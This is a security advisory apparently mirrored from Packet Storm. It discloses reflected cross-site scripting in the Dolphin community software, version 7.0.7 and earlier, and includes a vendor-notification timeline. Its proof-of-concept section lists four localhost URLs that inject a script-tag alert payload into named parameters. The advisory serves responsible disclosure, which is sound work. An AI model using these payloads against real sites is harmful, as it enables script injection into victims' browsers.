Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAung KhantPACKETSTORM:109995
HistoryFeb 21, 2012 - 12:00 a.m.

Dolphin 7.0.7 Cross Site Scripting

2012-02-2100:00:00
Aung Khant
packetstormsecurity.com
32

0.016 Low

EPSS

Percentile

87.5%

JSON
`1. OVERVIEW  
  
Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.  
  
  
2. BACKGROUND  
  
Dolphin is the only "all-in-one" free community software platform for  
creating your own social networking, community or online dating site  
without any limits and under your full control. Dolphin comes with  
hundreds of features, module plugins and tools. Everything is included  
and extension posibilities are literally endless. You can use it for  
free with a BoonEx link in the footer or buy a $99 permanent license  
to remove that requirement.  
  
  
3. VULNERABILITY DESCRIPTION  
  
Multiple parameters (explain,photos_only,online_only,mode) were not  
properly sanitized, which allows attacker to conduct Cross Site  
Scripting attack. This may allow an attacker to create a specially  
crafted URL that would execute arbitrary script code in a victim's  
browser.  
  
  
4. VERSIONS AFFECTED  
  
7.0.7 and lower  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
Vulnerable Parameter: explain  
  
http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E  
  
  
Vulnerable Parameters: photos_only,online_only,mode  
  
http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>  
  
http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>  
  
http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>  
  
  
6. SOLUTION  
  
Upgade to the latest version of Dolphine.  
  
  
7. VENDOR  
  
BoonEx Pty Ltd  
http://www.boonex.com/  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2011-06-09: notified vendor  
2011-10-24: fixed version, 7.0.8, released  
2012-02-20: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss  
BoonEx Home Page: http://www.boonex.com/  
  
  
#yehg [2012-02-20]  
`

Related

prion 1
cvelist 1
cve 1
nvd 1
securityvulns 1
prion
prion
Cross site scripting
2012-02-23 20:07:00
cvelist
cvelist
CVE-2012-0873
2022-10-03 16:15:41
cve
cve
CVE-2012-0873
2022-10-03 16:15:41
nvd
nvd
CVE-2012-0873
2012-02-23 20:07:33
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2012-02-22 00:00:00

0.016 Low

EPSS

Percentile

87.5%

JSON
Related for PACKETSTORM:109995
prion1cvelist1cve1nvd1securityvulns1